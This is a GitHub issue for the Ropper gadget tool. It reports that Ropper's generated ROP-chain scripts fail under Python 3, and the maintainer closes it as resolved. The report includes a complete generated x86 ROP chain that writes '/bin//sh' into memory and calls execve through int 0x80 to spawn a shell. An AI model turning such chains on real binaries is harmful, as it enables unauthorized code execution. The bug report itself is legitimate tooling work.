search

sashs / Ropper

Display information about files in different file formats and find gadgets to build rop chains for different architectures (x86/x86_64, ARM/ARM64, MIPS, PowerPC, SPARC64). For disassembly ropper uses the awesome Capstone Framework.
https://scoding.de/ropper
BSD 3-Clause "New" or "Revised" License
1.88k stars 206 forks source link

ropchain scripts are not python 3 compatible #142

Closed maybe-sybr closed 2 years ago

maybe-sybr commented 3 years ago

Attempting to create a chain for a test x86 binary spits out a script which doesn't work under Python 3. It looks like the chain generation code assumes strings are bytes in a number of places and needs to use the print() function rather than statement at the end of the generated script.

Python 3.9.2 (default, Feb 20 2021, 00:00:00)
[GCC 10.2.1 20201125 (Red Hat 10.2.1-9)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ropper
>>> rs = ropper.RopperService()
>>> rs.addFile("test_binary")
>>> rs.loadGadgetsFor()
>>> chain = rs.createRopChain('execve', 'x86')
>>> print(chain)
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # f8dae6777aaff082530fbde77fc04c2e3a25b15e3332da586f14aee10de1816c
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += '//bi'
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9060)
rop += rebase_0(0x0000fbc5) # 0x08057bc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9064)
rop += rebase_0(0x0000fbc5) # 0x08057bc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += p(0x00000000)
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9068)
rop += rebase_0(0x0000fbc5) # 0x08057bc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000001db) # 0x080481db: pop ebx; ret;
rop += rebase_0(0x000a9060)
rop += rebase_0(0x00035225) # 0x0807d225: pop ecx; and al, 0x81; ret;
rop += rebase_0(0x000a9068)
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9068)
rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += p(0x0000000b)
rop += rebase_0(0x00028550) # 0x08070550: int 0x80; ret;
print rop
>>> d = dict()
>>> exec(chain, d)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 36
    print rop
          ^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(rop)?
sashs commented 2 years ago

Resolved today. Push